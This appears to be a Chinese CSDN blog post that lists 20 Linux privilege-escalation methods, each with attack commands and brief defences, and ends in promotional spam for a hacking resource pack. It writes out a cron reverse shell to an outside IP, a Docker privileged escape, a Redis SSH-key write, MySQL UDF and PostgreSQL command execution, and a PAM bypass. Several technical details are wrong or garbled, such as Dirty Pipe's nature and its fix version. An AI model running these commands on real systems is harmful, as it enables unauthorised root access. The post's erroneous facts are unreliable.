黑客在Linux系统下提权的20种主要姿势！（非常详细）从零基础到精通，收藏这篇就够了！

Linux提权，攻防的绞肉机！别以为躲在乌龟壳里就万事大吉，黑客总能找到缝隙钻进来。内核漏洞、权限配置，哪个不是定时炸弹？光打补丁可不够，得建立一套立体防御体系，时刻提防那些不按套路出牌的家伙。下面这20种姿势，从入门到入土，看完保证你对Linux的“爱”更深沉。

一、内核漏洞：永远的噩梦？

1、脏牛（Dirty Cow）：老牛也能啃出新花样

原理：COW机制？听起来高大上，其实就是个“先斩后奏”的把戏。黑客利用竞争条件，直接往只读内存里写东西，想想都刺激。

攻击姿势：

先用“linux-exploit-suggester.sh”摸清你的内核底细。

然后，编译“dirtycow.c”，一脚踢开/etc/passwd的大门，加个root用户进去。

防御：内核升到4.8+，或者试试grsecurity，据说能让牛老实点。

2、Dirty Pipe：管道里的“毒药”

原理：pipe缓冲区溢出，听着就让人想吐。

攻击姿势：

把“dirtypipe.c”扔进去编译。

跑起来，往/etc/shadow里塞点“好东西”。

防御：内核升级到5.8+，或者干脆把pipe系统调用给毙了。

3、Use-After-Free：释放后的“幽灵”

原理：netfilter组件的双重释放漏洞，释放了又释放，刺激不？

攻击姿势：

用nft_verdict_init()构造个恶意数据包，让它自己撞上去。

然后，执行commit_creds(prepare_kernel_cred(0))，直接变身root。

防御：升到6.6+，或者把netfilter那些花里胡哨的功能关掉。

二、权限配置：猪队友挖的坑

4、SUID/SGID：谁给你的“尚方宝剑”？

原理：setuid/setgid，看似方便，实则埋雷。

攻击姿势：

用find / -perm -4000 -type f 2>/dev/null 揪出那些“带剑”的文件。

用nmap --interactive → !sh，直接“借剑杀人”。

防御：干掉不必要的SUID文件，用auditd盯紧权限变更。

5、sudo：用不好就是“自杀”

案例：

CVE-2021-3156：sudo缓冲区溢出，密码都不用输，直接root。

配置错误：ALL=(ALL)？你是嫌自己死得不够快吗？

防御：用visudo管住权限，定期审sudoers文件。

6、计划任务：定时“惊喜”？还是定时炸弹？

原理：修改或创建定时任务，让root帮你跑恶意脚本。

攻击姿势：

crontab -l，看看有没有可乘之机。

加个恶意任务：* * * * * /bin/bash -i >& /dev/tcp/``1.2.3.4/8080`` 0>&1，反弹shell，美滋滋。

防御：限制用户对/etc/cron.d的写入权限，用logrotate管好日志。

三、服务与环境变量：细节决定成败

7、NFS：信任？不存在的！

原理：no_root_squash？简直是把root权限双手奉上。

攻击姿势：

mount -t nfs ``10.0.0.1``:/export /mnt，挂载共享目录。

echo '#!/bin/bash' > /mnt/``shell.sh`` && chmod +s /mnt/``shell.sh，创建SUID文件。

防御：禁用no_root_squash，用root_squash限制权限。

8、环境变量：看似无害，实则暗藏杀机

案例：

PATH劫持：把恶意程序伪装成系统命令（比如ls），然后…嘿嘿。

LD_PRELOAD：预加载恶意库文件（lib.so），劫持函数调用。

防御：不在PATH里用.，限制LD_PRELOAD环境变量。

9、Docker逃逸：跑得快，死得也快？

原理：容器配置不当，直接冲出牢笼。

攻击姿势：

特权模式：docker run --privileged -v /:/mnt alpine chroot /mnt sh，直接骑在宿主机头上。

内核漏洞：脏牛再现，突破容器隔离。

防御：禁用特权模式，限制容器资源访问。

四、第三方组件：猪队友再+1

10、Redis：不设防的“后花园”

原理：Redis配置不当，谁都能来溜达。

攻击姿势：

redis-cli -h ``10.0.0.1，连上去再说。

config set dir /root/.ssh && config set dbfilename authorized_keys && set 1 "ssh-rsa ..."，写入SSH公钥，直接SSH登录。

防御：启用认证，绑定本地IP，禁用config命令。

11、MySQL UDF：自定义函数？还是自定义炸弹？

原理：通过自定义函数（UDF）执行系统命令。

攻击姿势：

select unhex('...') into dumpfile '/usr/lib/mysql/plugin/``shell.so``'，上传恶意.so文件。

create function sys_eval returns string soname '``shell.so``'，创建函数。

防御：限制secure_file_priv，禁用UDF功能。

12、PostgreSQL：老骥伏枥，还能搞事

原理：表达式索引以超级用户权限执行。

攻击姿势：

CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/``shell.so``' LANGUAGE C;，创建恶意函数。

SELECT sys_eval('id > /tmp/out.txt');，执行命令。

防御：升级到9.0+，限制函数执行权限。

五、系统配置与服务：细节，还是细节！

13、SELinux：看似强大，也能绕过

案例：

布尔值配置：把httpd_can_network_connect改成on。

策略文件篡改：删掉/etc/selinux/targeted/policy/policy.31。

防御：用setsebool调整策略，定期审计SELinux日志。

14、systemd：启动的不仅是服务，还有风险

原理：修改服务二进制路径，指向恶意文件。

攻击姿势：

创建恶意服务文件：/etc/systemd/system/malicious.service。

启动服务：systemctl enable --now malicious.service。

防御：限制/etc/systemd目录权限，用systemd-analyze检查配置。

15、PAM：认证？还是放水？

原理：PAM模块配置不当，密码验证形同虚设。

攻击姿势：

修改/etc/pam.d/su，加上auth sufficient ``pam_permit.so。

su - root，密码？不存在的。

防御：用pam_tally2限制登录尝试，定期检查PAM配置。

六、高级技术：进阶玩家的“玩具”

16、条件竞争：多线程的“混乱”

案例：CVE-2014-0038（compat_sys_recvmmsg函数堆溢出）。

攻击姿势：

构造多线程竞争，触发堆溢出。

执行commit_creds(prepare_kernel_cred(0))。

防御：用锁机制，避免共享资源竞争。

17、/dev/ptmx：伪终端的“诱惑”

原理：通过/dev/ptmx设备文件获取伪终端。

攻击姿势：

open("/dev/ptmx", O_RDWR)，创建伪终端。

ioctl(fd, TIOCSCTTY, 0)，绑定终端。

防御：限制/dev/ptmx权限，用udev规则管控。

18、X Window：图形界面的“漏洞”

原理：xhost +，允许远程连接。

攻击姿势：

执行xhost +。

用xterm连接：xterm -display :0。

防御：禁用X Window服务，用Xorg配置文件限制访问。

19、CAP_NET_ADMIN：网络管理员的“权力”

原理：CAP_NET_ADMIN允许修改网络配置。

攻击姿势：

ip link add name dummy0 type dummy，创建虚拟网卡。

ip route add default via ``10.0.0.1`` dev dummy0，配置路由表。

防御：用setcap移除不必要的权限，限制CAP_NET_ADMIN。

20、LD_LIBRARY_PATH：共享库的“陷阱”

原理：预加载恶意库文件，劫持函数调用。

攻击姿势：

echo 'void _init() { system("/bin/sh"); }' > ``libtest.so，创建恶意库。

LD_LIBRARY_PATH=. ./vuln_program，执行程序。

防御：不在LD_LIBRARY_PATH里用.，限制用户写入权限。

防御？别想一劳永逸！

内核？勤打补丁！用好工具！

及时更新内核，grsecurity、PaX安排上。

不用的模块，统统关掉！

权限？最小化！审计！

限制SUID/SGID文件，sudoers文件盯紧点。

服务？该禁的禁！该认证的认证！

NFS的no_root_squash，Docker容器权限，Redis认证，MySQL的UDF…

环境变量？小心驶得万年船！

PATH、LD_PRELOAD，别乱来！

日志？多看看，总没错！

auditd监控文件权限变更，SELinux日志审计。

第三方组件？定期体检！

Redis、MySQL，更新！更新！更新！危险功能，禁用！

黑客/网络安全学习包

资料目录

1. 成长路线图&学习规划

2. 配套视频教程

3. SRC&黑客文籍

4. 护网行动资料

5. 黑客必读书单

6. 面试题合集

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

*************************************CSDN大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

1.成长路线图&学习规划

要学习一门新的技术，作为新手一定要先学习成长路线图，方向不对，努力白费。

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

*************************************CSDN大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

2.视频教程

很多朋友都不喜欢晦涩的文字，我也为大家准备了视频教程，其中一共有21个章节，每个章节都是当前板块的精华浓缩。

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

*************************************CSDN大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍：

黑客资料由于是敏感资源，这里不能直接展示哦！

4.护网行动资料

其中关于HW护网行动，也准备了对应的资料，这些内容可相当于比赛的金手指！

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里，你就要开始思考找工作的事情了，而工作绕不开的就是真题和面试题。

更多内容为防止和谐，可以扫描获取~

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

*************************************CSDN大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享*********************************